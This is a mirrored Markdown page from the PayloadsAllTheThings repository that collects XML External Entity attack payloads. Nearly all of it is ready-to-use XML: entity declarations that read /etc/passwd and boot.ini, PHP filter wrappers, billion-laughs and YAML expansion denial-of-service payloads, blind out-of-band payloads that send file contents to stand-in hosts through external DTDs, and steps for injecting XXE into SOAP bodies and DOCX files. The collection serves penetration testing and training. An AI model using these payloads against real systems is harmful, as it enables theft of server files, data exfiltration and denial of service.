mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-21 11:56:11 +00:00
187 lines
4.5 KiB
Markdown
187 lines
4.5 KiB
Markdown
# XML External Entity
|
|
|
|
An XML External Entity attack is a type of attack against an application that parses XML input
|
|
|
|
## Exploit
|
|
|
|
Basic Test
|
|
|
|
```xml
|
|
<!--?xml version="1.0" ?-->
|
|
<!DOCTYPE replace [<!ENTITY example "Doe"> ]>
|
|
<userInfo>
|
|
<firstName>John</firstName>
|
|
<lastName>&example;</lastName>
|
|
</userInfo>
|
|
```
|
|
|
|
## Basic XXE
|
|
|
|
Classic XXE
|
|
|
|
```xml
|
|
<?xml version="1.0"?>
|
|
<!DOCTYPE data [
|
|
<!ELEMENT data (#ANY)>
|
|
<!ENTITY file SYSTEM "file:///etc/passwd">
|
|
]>
|
|
<data>&file;</data>
|
|
```
|
|
|
|
```xml
|
|
<?xml version="1.0" encoding="ISO-8859-1"?>
|
|
<!DOCTYPE foo [
|
|
<!ELEMENT foo ANY >
|
|
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo>
|
|
```
|
|
|
|
```xml
|
|
<?xml version="1.0" encoding="ISO-8859-1"?>
|
|
<!DOCTYPE foo [
|
|
<!ELEMENT foo ANY >
|
|
<!ENTITY xxe SYSTEM "file:///c:/boot.ini" >]><foo>&xxe;</foo>
|
|
```
|
|
|
|
Classic XXE Base64 encoded
|
|
|
|
```xml
|
|
<!DOCTYPE test [ <!ENTITY % init SYSTEM "data://text/plain;base64,ZmlsZTovLy9ldGMvcGFzc3dk"> %init; ]><foo/>
|
|
```
|
|
|
|
## PHP Wrapper inside XXE
|
|
|
|
```xml
|
|
<!DOCTYPE replace [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php"> ]>
|
|
<contacts>
|
|
<contact>
|
|
<name>Jean &xxe; Dupont</name>
|
|
<phone>00 11 22 33 44</phone>
|
|
<adress>42 rue du CTF</adress>
|
|
<zipcode>75000</zipcode>
|
|
<city>Paris</city>
|
|
</contact>
|
|
</contacts>
|
|
```
|
|
|
|
```xml
|
|
<?xml version="1.0" encoding="ISO-8859-1"?>
|
|
<!DOCTYPE foo [
|
|
<!ELEMENT foo ANY >
|
|
<!ENTITY % xxe SYSTEM "php://filter/convert.bae64-encode/resource=http://10.0.0.3" >
|
|
]>
|
|
<foo>&xxe;</foo>
|
|
```
|
|
|
|
## Deny of service
|
|
|
|
Deny Of Service - Billion Laugh Attack
|
|
|
|
```xml
|
|
<!DOCTYPE data [
|
|
<!ENTITY a0 "dos" >
|
|
<!ENTITY a1 "&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;">
|
|
<!ENTITY a2 "&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;">
|
|
<!ENTITY a3 "&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;">
|
|
<!ENTITY a4 "&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;">
|
|
]>
|
|
<data>&a4;</data>
|
|
```
|
|
|
|
Yaml attack
|
|
|
|
```xml
|
|
a: &a ["lol","lol","lol","lol","lol","lol","lol","lol","lol"]
|
|
b: &b [*a,*a,*a,*a,*a,*a,*a,*a,*a]
|
|
c: &c [*b,*b,*b,*b,*b,*b,*b,*b,*b]
|
|
d: &d [*c,*c,*c,*c,*c,*c,*c,*c,*c]
|
|
e: &e [*d,*d,*d,*d,*d,*d,*d,*d,*d]
|
|
f: &f [*e,*e,*e,*e,*e,*e,*e,*e,*e]
|
|
g: &g [*f,*f,*f,*f,*f,*f,*f,*f,*f]
|
|
h: &h [*g,*g,*g,*g,*g,*g,*g,*g,*g]
|
|
i: &i [*h,*h,*h,*h,*h,*h,*h,*h,*h]
|
|
```
|
|
|
|
## Blind XXE - Out of Band
|
|
|
|
### Blind XXE
|
|
|
|
```xml
|
|
<?xml version="1.0" encoding="ISO-8859-1"?>
|
|
<!DOCTYPE foo [
|
|
<!ELEMENT foo ANY >
|
|
<!ENTITY % xxe SYSTEM "file:///etc/passwd" >
|
|
<!ENTITY callhome SYSTEM "www.malicious.com/?%xxe;">
|
|
]
|
|
>
|
|
<foo>&callhome;</foo>
|
|
```
|
|
|
|
### XXE OOB Attack (Yunusov, 2013)
|
|
|
|
```xml
|
|
<?xml version="1.0" encoding="utf-8"?>
|
|
<!DOCTYPE data SYSTEM "http://publicServer.com/parameterEntity_oob.dtd">
|
|
<data>&send;</data>
|
|
|
|
File stored on http://publicServer.com/parameterEntity_oob.dtd
|
|
<!ENTITY % file SYSTEM "file:///sys/power/image_size">
|
|
<!ENTITY % all "<!ENTITY send SYSTEM 'http://publicServer.com/?%file;'>">
|
|
%all;
|
|
```
|
|
|
|
### XXE OOB with DTD and PHP filter
|
|
|
|
```xml
|
|
<?xml version="1.0" ?>
|
|
<!DOCTYPE r [
|
|
<!ELEMENT r ANY >
|
|
<!ENTITY % sp SYSTEM "http://127.0.0.1/dtd.xml">
|
|
%sp;
|
|
%param1;
|
|
]>
|
|
<r>&exfil;</r>
|
|
|
|
File stored on http://127.0.0.1/dtd.xml
|
|
<!ENTITY % data SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
|
|
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://127.0.0.1/dtd.xml?%data;'>">
|
|
```
|
|
|
|
### XXE Inside SOAP
|
|
|
|
```xml
|
|
<soap:Body><foo><![CDATA[<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://x.x.x.x:22/"> %dtd;]><xxx/>]]></foo></soap:Body>
|
|
```
|
|
|
|
### XXE Inside DOCX file
|
|
|
|
Format of an Open XML file (inject the payload in any .xml file):
|
|
|
|
- /_rels/.rels
|
|
- [Content_Types].xml
|
|
- Default Main Document Part
|
|
- /word/document.xml
|
|
- /ppt/presentation.xml
|
|
- /xl/workbook.xml
|
|
|
|
Then update the file `zip -u xxe.docx [Content_Types].xml`
|
|
|
|
Tool : https://github.com/BuffaloWill/oxml_xxe
|
|
|
|
```xml
|
|
DOCX/XLSX/PPTX
|
|
ODT/ODG/ODP/ODS
|
|
SVG
|
|
XML
|
|
PDF (experimental)
|
|
JPG (experimental)
|
|
GIF (experimental)
|
|
```
|
|
|
|
## Thanks to
|
|
|
|
* [XML External Entity (XXE) Processing - OWASP](https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing)
|
|
* [Detecting and exploiting XXE in SAML Interfaces - Von Christian Mainka](http://web-in-security.blogspot.fr/2014/11/detecting-and-exploiting-xxe-in-saml.html)
|
|
* [staaldraad - XXE payloads](https://gist.github.com/staaldraad/01415b990939494879b4)
|
|
* [mgeeky - XML attacks](https://gist.github.com/mgeeky/4f726d3b374f0a34267d4f19c9004870)
|
|
* [Exploiting xxe in file upload functionality - BLACKHAT WEBCAST- 11/19/15 Will Vandevanter - @_will_is_](https://www.blackhat.com/docs/webcast/11192015-exploiting-xml-entity-vulnerabilities-in-file-parsing-functionality.pdf)
|
|
* [XXE ALL THE THINGS!!! (including Apple iOS's Office Viewer)](http://en.hackdig.com/08/28075.htm) |